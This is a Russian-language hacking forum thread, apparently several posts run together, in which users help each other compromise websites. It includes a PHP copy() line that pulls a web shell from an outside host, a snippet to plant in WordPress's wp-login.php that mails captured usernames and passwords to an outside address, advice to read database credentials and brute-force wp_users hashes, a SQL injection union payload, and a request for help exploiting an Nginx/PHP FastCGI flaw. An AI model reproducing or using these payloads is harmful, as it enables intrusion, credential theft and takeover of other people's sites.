у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел? copy('http://lol.com/shell.txt','/pwd/shell.php');
copy system eval и так далее выключены. Уже залился через локал инклуид. Если бы было так просто я бы не спрашивал.
посмотреть в конфиге пароль от бд, подключиться к базе и глянуть в wp_users, ну а далее сбрутить хеш ну и второй вариант: повесить снифер в код wordpress, который при логине в админку будет писать введённые данные в файл
А может есть какой-нибудь скрипт, который будет вытаскивать эти данные самостоятельно? Ну или нового суперюзера создавать в ВП?
В начало файла wp-login.php добавить: PHP: if (!empty($_POST['log']) && !empty($_POST['pwd'])) {$msg = "Login: " . $_POST['log'] . "\n";$msg .= "Pass: " . $_POST['pwd'];@mail('[email protected]', 'What you need', $msg);}
union select 1,2,3,(select@%20from(select@:=0x00,(select 1 from(select*from user ORDER BY userid ASC limit 0,5)w where(@:=concat(@,0x3c62723e,username))))q) как тут задать бд к которой обращаться ?
Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость: Nginx PHP code execution via FastCGI Vulnerability description A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue. This vulnerability affects Web Server. Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.script). Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.